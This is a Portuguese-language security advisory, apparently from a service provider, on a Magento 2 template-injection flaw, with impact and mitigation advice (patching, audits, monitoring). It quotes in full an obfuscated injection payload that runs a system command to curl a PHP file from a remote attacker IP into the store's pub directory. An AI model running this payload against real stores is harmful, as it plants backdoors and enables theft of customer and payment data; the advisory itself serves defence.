Recentemente, uma vulnerabilidade crítica foi identificada no sistema de e-commerce Magento 2. A vulnerabilidade permite que atacantes executem comandos remotos maliciosos no servidor da loja, comprometendo a integridade e a segurança dos dados dos utilizadores e comerciantes.
Descrição do Ataque
O ataque foi é através da exploração de uma vulnerabilidade que permite a injeção de comandos maliciosos na plataforma Magento 2. A ataque acontece por meio de uma falha no sistema de templates do Magento, onde o atacante consegue injetar código malicioso ao manipular variáveis específicas no template.
No caso específico relatado, o código malicioso injetado foi o seguinte:
{{var this.getTemp lateFil ter().filt er(order)}} {{var this.getTemp lateFil ter().add AfterFil terCallb ack(system).Fil ter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS%??}http://195.153.161.205/cache.php?m=48161-787-33048)}}
Aqui, o código malicioso utiliza funções de template do Magento para inserir comandos no servidor. O primeiro trecho do código tenta aceder a um filtro de template associado a um pedido. Em seguida, o segundo trecho realiza uma injeção de comando que utiliza variáveis de ambiente e comandos do sistema operacional para descarregar um arquivo malicioso (cache.php) de um servidor remoto, controlado pelo atacante, e salvá-lo no diretório pub do Magento.
Esse arquivo pode ser utilizado para diversas finalidades, como:
- Criação de Backdoors: Para manter o acesso ao servidor comprometido mesmo após a detecção inicial do ataque.
- Roubo de Dados: Coleta de informações sensíveis, como dados de clientes, informações de pagamento, entre outros.
- Alteração do Conteúdo do Site: Modificação de páginas, inserção de scripts maliciosos que podem infectar os visitantes do site.
Impacto e Consequências
O impacto de tal vulnerabilidade é extremamente grave, pois possibilita o comprometimento total do sistema e atacantes podem roubar dados confidenciais, alterar transações e comprometer a confiança dos clientes na loja.
As empresas que utilizam o Magento 2 precisam estar cientes da gravidade desta ameaça e tomar medidas imediatas para mitigar o risco. Entre as medidas sugeridas estão:
- Atualização Imediata: Garantir que o Magento 2 esteja atualizado com os últimos patches de segurança lançados pela Adobe, empresa responsável pelo Magento ( Versão 2.4.X-P9 ).
- Auditoria de Segurança: Realizar auditorias regulares para identificar e corrigir possíveis vulnerabilidades no sistema.
- Monitoramento Permanente: Implementar ferramentas de monitoramento de segurança para detectar atividades suspeitas em tempo real.
Prevenção e Mitigação
Se a sua loja foi vitima deste ataque e precisa de ajuda entre em contacto connosco, temos ferramentas e técnicas que podem ajudar a melhorar a segurança da sua loja online.